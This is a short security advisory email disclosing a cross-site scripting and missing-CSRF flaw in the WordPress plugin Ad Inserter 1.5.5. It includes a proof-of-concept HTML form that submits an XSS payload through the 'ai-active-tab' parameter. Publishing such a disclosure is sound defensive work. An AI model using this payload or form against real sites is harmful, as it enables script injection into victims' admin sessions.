Subject: Cross-Site Scripting (XSS) in Ad Inserter 1.5.5

Date: Thu, 13 Aug 2015 12:06:59 +0200

Hello,

Plugin: Ad Inserter 1.5.5 https://wordpress.org/plugins/ad-inserter/

1. Cross-Site Scripting (XSS)

Authenticated administrators can inject html/js code (there is no CSRF protection).

Method: POST

Url: http://localhost/wp-admin/options-general.php?page=ad-inserter.php

Vulnerable parameter: ai-active-tab

Example PHP callstack:

ai_settings [/ad-inserter/ad-inserter.php:696]

print_settings_form [/ad-inserter/settings.php:516]

Verification:

--

<form method="POST" action="http://localhost/wp-admin/options-general.php?page=ad-inserter.php">

<input type="text" name="ai-active-tab" value='"><img src=x onerror=alert(1) />'>

<input type="submit" />

</form>

--

--

Regards,
Marcin Probola,